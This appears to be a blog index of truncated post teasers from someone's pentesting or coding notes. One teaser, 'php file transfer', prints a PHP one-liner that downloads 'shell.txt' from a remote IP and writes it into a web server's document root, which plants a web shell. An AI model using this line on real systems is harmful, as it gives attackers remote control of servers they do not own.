Scratchpad – python notes
This page contains random notes and snippets of stuff learned during my python coding projects. It’s more or less a
Read moreThis page contains random notes and snippets of stuff learned during my python coding projects. It’s more or less a
Read morephp file transfer Nice PHP Example to transfer code <?php file_put_contents(“/var/www/html/sedje.php”, file_get_contents(“http://10.13.37.152/shell.txt”));?> interactive shell A method for better interactive shell
Read more